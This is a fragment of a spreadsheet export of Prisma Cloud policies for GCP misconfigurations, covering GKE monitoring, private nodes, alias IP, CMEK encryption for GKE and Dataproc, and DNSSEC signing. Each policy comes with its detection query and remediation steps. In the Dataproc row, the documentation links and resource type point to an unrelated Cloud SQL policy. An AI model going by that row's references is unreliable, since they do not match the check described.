          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'monitoringService does not exist or monitoringService equals none'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2902" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2902" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2902" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-144-CKV_GCP_8</t>
        </is>
      </c>
      <c r="AD2902" t="b">
        <v>1</v>
      </c>
      <c r="AE2902" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2902" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>ca4b4654-d36a-4b17-a055-9c5063fa2f41</t>
        </is>
      </c>
      <c r="AI2902" t="inlineStr">
        <is>
          <t>d1bad16c-40ed-485f-8638-27cfa5983ed8</t>
        </is>
      </c>
      <c r="AJ2902" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2902" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2903">
      <c r="A2903" t="inlineStr">
        <is>
          <t>Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, PCI DSS v4.0, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.1.0 (GKE), Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CIS Controls v7.1, Secure Controls Framework (SCF) - 2024.2, CIS v1.3.0 (GKE) - Level 1, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, tadenugba Copy of CIS v1.1.0 (GKE), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], CIS v1.5.0 (GKE) - Level 1, CIS v1.4.0 (GKE) - Level 1, ISO/IEC 27001:2022, Copy of CIS Controls v8, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CRI Profile v1.2.1, CIS v1.2.0 (GKE), NIST SP 800-171 Revision 2, ISO 27002:2022, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2903" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2903" s="2" t="inlineStr"/>
      <c r="D2903" t="inlineStr"/>
      <c r="E2903" t="inlineStr"/>
      <c r="F2903" t="inlineStr"/>
      <c r="G2903" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2903" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2903" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters not configured with private nodes feature</t>
        </is>
      </c>
      <c r="L2903" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2903" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2903" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2903" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2903" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2903" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2903" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2903" t="inlineStr"/>
      <c r="T2903" t="b">
        <v>0</v>
      </c>
      <c r="U2903" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2903" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2903" t="inlineStr">
        <is>
          <t>This policy identifies Google Kubernetes Engine (GKE) Clusters which are not configured with the private nodes feature. Private nodes feature makes your master inaccessible from the public internet and nodes do not have public IP addresses, so your workloads run in an environment that is isolated from the internet.</t>
        </is>
      </c>
      <c r="X2903" t="inlineStr">
        <is>
          <t>GCP Kubernetes private node feature can be enabled at the time of cluster creation. So to fix this alert, Create a new cluster with a private node feature enabled on it and migrate all required data from reported cluster to the newly created cluster and delete reported Kubernetes engine cluster.
To create new Kubernetes engine cluster with private node feature enabled, perform the following: 
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters
4. Click on CREATE CLUSTER button
5. Click on 'Advanced options'
6. Under the Networking section, Check the 'Enable VPC-native (using alias IP)' option
7. Choose the required Network, Node subnet parameters
8. From Network security, select the Private cluster check box.
9. To create a master that is accessible from authorized external IP ranges, keep the 'Access master using its external IP address' checkbox selected.
9. Set 'Master IP range' to as per your required IP range
10. Click on 'Create'
NOTE: When you create a private cluster, you must specify a /28 CIDR range for the VMs that run the Kubernetes master components.
To delete reported Kubernetes engine cluster, perform the following:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on reported Kubernetes cluster
5. Click on the DELETE button
6. On 'Delete a cluster' popup dialog, Click on DELETE to confirm the deletion of the cluster. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes</t>
        </is>
      </c>
      <c r="Y2903" t="inlineStr"/>
      <c r="Z2903" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'privateClusterConfig.enablePrivateNodes does not exist or privateClusterConfig.enablePrivateNodes is false'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2903" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2903" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2903" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-364-CKV_GCP_64</t>
        </is>
      </c>
      <c r="AD2903" t="b">
        <v>1</v>
      </c>
      <c r="AE2903" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2903" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>f5db1fcd-aa46-490e-9068-dd499ddb364b</t>
        </is>
      </c>
      <c r="AI2903" t="inlineStr">
        <is>
          <t>5e4752d9-554b-4a6b-bad3-b41ba62fa6f7</t>
        </is>
      </c>
      <c r="AJ2903" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2903" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2904">
      <c r="A2904" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, CIS Controls v8.1, HITRUST CSF v.11.2.0, SOC 2, GDPR, Microsoft Cloud Security Benchmark v1, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2904" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2904" s="2" t="inlineStr"/>
      <c r="D2904" t="inlineStr"/>
      <c r="E2904" t="inlineStr"/>
      <c r="F2904" t="inlineStr"/>
      <c r="G2904" t="b">
        <v>1</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2904" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2904" t="inlineStr">
        <is>
          <t>GCP GKE cluster node boot disk not encrypted with CMEK</t>
        </is>
      </c>
      <c r="L2904" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2904" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2904" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2904" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2904" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2904" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2904" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2904" t="inlineStr"/>
      <c r="T2904" t="b">
        <v>0</v>
      </c>
      <c r="U2904" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2904" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2904" t="inlineStr">
        <is>
          <t>This policy identifies GCP GKE clusters that do not have their node boot disk encrypted with CMEK.
The GKE node boot disk is the persistent disk that houses the Kubernetes node file system. By default, this disk is encrypted by a GCP managed key but users can specify customer managed encryption key to get enhanced security, control over the encryption key, and also comply with any regulatory requirements.
It is recommended to use CMEK to encrypt the boot disk of GKE cluster nodes as it gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X2904" t="inlineStr">
        <is>
          <t>The KMS key used for node boot disk encryption for existing GKE clusters/cluster nodes cannot be changed. 
For standard clusters:
Either create a new standard cluster with node boot disk encryption using CMEK or add new node pools with disk encryption using CMEK to an existing standard cluster while removing older node pools which do not have node boot disk CMEK configured. To encrypt GKE standard cluster node boot disks using CMEK, please refer to the URLs given below:
https://cloud.google.com/kubernetes-engine/docs/how-to/using-cmek#boot-disks
For autopilot clusters:
Autopilot cluster node boot disk encryption cannot be updated for existing autopilot clusters. To create a new autopilot cluster with CMEK protected node boot disk, please refer to the URLs given below:
https://cloud.google.com/kubernetes-engine/docs/how-to/using-cmek#create_a_cluster_with_a_cmek-protected_node_boot_disk</t>
        </is>
      </c>
      <c r="Y2904" t="inlineStr"/>
      <c r="Z2904" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = status equals "RUNNING" and nodePools[?any(config.bootDiskKmsKey does not exist)] exists</t>
        </is>
      </c>
      <c r="AA2904" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2904" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2904" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-1110</t>
        </is>
      </c>
      <c r="AD2904" t="b">
        <v>1</v>
      </c>
      <c r="AE2904" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2904" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>39319143-bae2-4741-adf0-9e1db85f994c</t>
        </is>
      </c>
      <c r="AI2904" t="inlineStr">
        <is>
          <t>ab1c9b4d-aa86-4c34-a550-5de4bd30882b</t>
        </is>
      </c>
      <c r="AJ2904" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2904" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2905">
      <c r="A2905" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, CIS v1.5.0 (GKE) - Level 1, GDPR, CIS Controls v8, APRA (CPS 234) Information Security, NIST CSF, NIST CSF v2.0, NIST CSF, CIS v1.1.0 (GKE), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO 27002:2022, CIS Controls v7.1, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], Telecommunications Security Act - TSA, GDPR, jbrox - GDPR, RBI Baseline Cyber Security and Resilience Requirements, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, PCI DSS v3.2.1, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], ISO/IEC 27001:2022, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, SOC 2, CIS v1.4.0 (GKE) - Level 1, Secure Controls Framework (SCF) - 2024.2, PCI DSS v3.2.1, NIST 800-53 Rev 5, PCI DSS v4.0, CIS v1.3.0 (GKE) - Level 1, SOC 2, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, PCI DSS v4.0, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-171 Revision 3, NIST CSF, CIS Controls v8.1, ISO 27002:2022, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, CIS v1.0.0 (GCP), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), APRA (CPS 234) Information Security, NIST CSF, SOC 2, CSA CCM v3.0.1, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, Copy of CIS Controls v8, NIST CSF, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, tadenugba Copy of CIS v1.1.0 (GKE), NIST SP 800-172, CSA CCM v3.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v1.2.0 (GKE)</t>
        </is>
      </c>
      <c r="B2905" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2905" s="2" t="inlineStr"/>
      <c r="D2905" t="inlineStr"/>
      <c r="E2905" t="inlineStr"/>
      <c r="F2905" t="inlineStr"/>
      <c r="G2905" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2905" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2905" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Alias IP disabled</t>
        </is>
      </c>
      <c r="L2905" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2905" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2905" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2905" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2905" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2905" t="inlineStr">
        <is>
          <t>Managed Services</t>
        </is>
      </c>
      <c r="R2905" t="inlineStr">
        <is>
          <t>5.6.2</t>
        </is>
      </c>
      <c r="S2905" t="inlineStr"/>
      <c r="T2905" t="b">
        <v>0</v>
      </c>
      <c r="U2905" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2905" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2905" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which have disabled Alias IP. Alias IP allows the networking layer to perform anti-spoofing checks to ensure that egress traffic is not sent with arbitrary source IPs. By enabling Alias IPs, Kubernetes Engine clusters can allocate IP addresses from a CIDR block known to Google Cloud Platform. This makes your cluster more scalable and allows your cluster to better interact with other GCP products and entities.</t>
        </is>
      </c>
      <c r="X2905" t="inlineStr">
        <is>
          <t>GCP Kubernetes Clusters Alias IP can be enabled only at the time of creation of clusters. So to fix this alert, create a new cluster with Alias IP enabled and then migrate all required cluster data or containers from the reported cluster to this new cluster.
To create the cluster with Alias IP enabled, perform following steps:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters
5. Click on 'CREATE CLUSTER' button
6. Configure your cluster and click on 'More'
7. From the 'VPC-native (using alias IP)' drop-down menu, select 'Enabled'. New menu items appear
8. From 'Automatically create secondary ranges' drop-down menu, select 'Enabled' 
9. Configure the 'Network', 'Node subnet', 'Node address range', 'Container address range', and 'Service address range' as needed
10. Click on Create 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15</t>
        </is>
      </c>
      <c r="Y2905" t="inlineStr"/>
      <c r="Z2905" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'ipAllocationPolicy.useIpAliases does not exist or ipAllocationPolicy.useIpAliases equals false'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2905" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2905" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2905" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-152-CKV_GCP_23</t>
        </is>
      </c>
      <c r="AD2905" t="b">
        <v>1</v>
      </c>
      <c r="AE2905" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2905" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>63b162f4-628c-4d4a-a094-63c12ebc4ba2</t>
        </is>
      </c>
      <c r="AI2905" t="inlineStr">
        <is>
          <t>79ac5d52-f01a-4b82-8aab-f2dd674452a3</t>
        </is>
      </c>
      <c r="AJ2905" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2905" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2906">
      <c r="A2906" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, CIS v3.0.0 (GCP) Level 2, HITRUST CSF v.11.2.0, GDPR, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, HIPAA, CIS v2.0.0 (GCP) Level 2, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2906" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2906" s="2" t="inlineStr"/>
      <c r="D2906" t="inlineStr"/>
      <c r="E2906" t="inlineStr"/>
      <c r="F2906" t="inlineStr"/>
      <c r="G2906" t="b">
        <v>1</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2906" t="inlineStr">
        <is>
          <t>gcloud-dataproc</t>
        </is>
      </c>
      <c r="K2906" t="inlineStr">
        <is>
          <t>GCP Dataproc Cluster not configured with Customer-Managed Encryption Key (CMEK)</t>
        </is>
      </c>
      <c r="L2906" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2906" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2906" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2906" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2906" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2906" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2906" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2906" t="inlineStr"/>
      <c r="T2906" t="b">
        <v>0</v>
      </c>
      <c r="U2906" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2906" t="inlineStr">
        <is>
          <t>gcloud-dataproc-clusters-list</t>
        </is>
      </c>
      <c r="W2906" t="inlineStr">
        <is>
          <t>This policy identifies Dataproc Clusters that are not configured with CMEK. Dataproc cluster and job data are stored on persistent disks associated with the Compute Engine VMs in the cluster as well as in a Cloud Storage staging bucket. As a security best practice use of CMEK to encrypt this data on persistent disk and bucket is advisable and provides more control to the user.</t>
        </is>
      </c>
      <c r="X2906" t="inlineStr">
        <is>
          <t>Currently, it is not possible to update the encryption key for a GCP Dataproc Cluster. It is recommended to create a new cluster with appropriate CMEK and migrate all workloads from the old cluster to the new cluster.
To configure encryption key for GCP Dataproc Cluster while creation, please refer to the URL given below:
https://cloud.google.com/dataproc/docs/concepts/configuring-clusters/customer-managed-encryption#use_cmek_with_cluster_data 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version</t>
        </is>
      </c>
      <c r="Y2906" t="inlineStr"/>
      <c r="Z2906" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-dataproc-clusters-list' AND json.rule = config.encryptionConfig.gcePdKmsKeyName does not exist and config.encryptionConfig.kmsKey does not exist
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2906" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2906" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2906" t="inlineStr">
        <is>
          <t>PC-GCP-DPC-1100-CKV_GCP_79</t>
        </is>
      </c>
      <c r="AD2906" t="b">
        <v>1</v>
      </c>
      <c r="AE2906" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2906" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>398aa1d3-0edd-4cf3-b2c3-b861a27be225</t>
        </is>
      </c>
      <c r="AI2906" t="inlineStr">
        <is>
          <t>1c6b2db1-66d3-44ee-8b4e-629e46b6bb88</t>
        </is>
      </c>
      <c r="AJ2906" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2906" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2907">
      <c r="A2907" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, CIS Controls v8.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-172, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.0 (GCP), ISO/IEC 27017:2015, ISO 27001:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.6, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS v1.1.0 (GCP), Copy of CIS Controls v8, CIS Controls v7.1, ISO 27001:2013, NIST CSF, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, ISO 27002:2022, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS v1.2.0 (GCP), Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, PCI DSS v3.2.1, CIS v1.0.0 (GCP), ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 1, ISO/IEC 27017:2015, Rehan, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, PCI DSS v4.0, APRA (CPS 234) Information Security, CIS v2.0.0 (GCP) Level 1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, ITSG-33, TX-RAMP Level 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8, CCPA 2018, ISO/IEC 27001:2022, PIPEDA, CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Brazilian Data Protection Law (LGPD), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019, FFIEC</t>
        </is>
      </c>
      <c r="B2907" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2907" s="2" t="inlineStr"/>
      <c r="D2907" t="inlineStr"/>
      <c r="E2907" t="inlineStr"/>
      <c r="F2907" t="inlineStr"/>
      <c r="G2907" t="b">
        <v>0</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2907" t="inlineStr">
        <is>
          <t>gcloud-dns</t>
        </is>
      </c>
      <c r="K2907" t="inlineStr">
        <is>
          <t>GCP Cloud DNS zones using RSASHA1 algorithm for DNSSEC zone-signing</t>
        </is>
      </c>
      <c r="L2907" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2907" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2907" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2907" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2907" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2907" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2907" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2907" t="inlineStr"/>
      <c r="T2907" t="b">
        <v>0</v>
      </c>
      <c r="U2907" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2907" t="inlineStr">
        <is>
          <t>gcloud-dns-managed-zone</t>
        </is>
      </c>
      <c r="W2907" t="inlineStr">
        <is>
          <t>This policy identifies the GCP Cloud DNS zones which are using the RSASHA1 algorithm for DNSSEC zone-signing. DNSSEC is a feature of the Domain Name System that authenticates responses to domain name lookups and also prevents attackers from manipulating or poisoning the responses to DNS requests. So the algorithm used for key signing should be recommended one and it should not be weak.</t>
        </is>
      </c>
      <c r="X2907" t="inlineStr">
        <is>
          <t>Currently, DNSSEC zone-signing can be updated using command line interface only.
1. If you need to change the settings for a managed zone where it has been enabled, you have to turn DNSSEC off and then re-enable it with different settings. To turn off DNSSEC, run following command:
gcloud dns managed-zones update &lt;ZONE_NAME&gt; --dnssec-state off
2. To update zone-signing for a reported managed DNS Zone, run following command:
gcloud dns managed-zones update &lt;ZONE_NAME&gt; --dnssec-state on --ksk-algorithm &lt;KSK_ALGORITHM&gt; --ksk-key-length &lt;KSK_KEY_LENGTH&gt; --zsk-algorithm &lt;ZSK_ALGORITHM&gt; --zsk-key-length &lt;ZSK_KEY_LENGTH&gt; --denial-of-existence &lt;DENIAL_OF_EXISTENCE&gt;</t>
        </is>
      </c>
      <c r="Y2907" t="inlineStr"/>
      <c r="Z2907" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-dns-managed-zone' AND json.rule = 'dnssecConfig.defaultKeySpecs[*].keyType contains zoneSigning and dnssecConfig.defaultKeySpecs[*].algorithm contains rsasha1'</t>
        </is>
      </c>
      <c r="AA2907" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2907" t="inlineStr">
        <is>
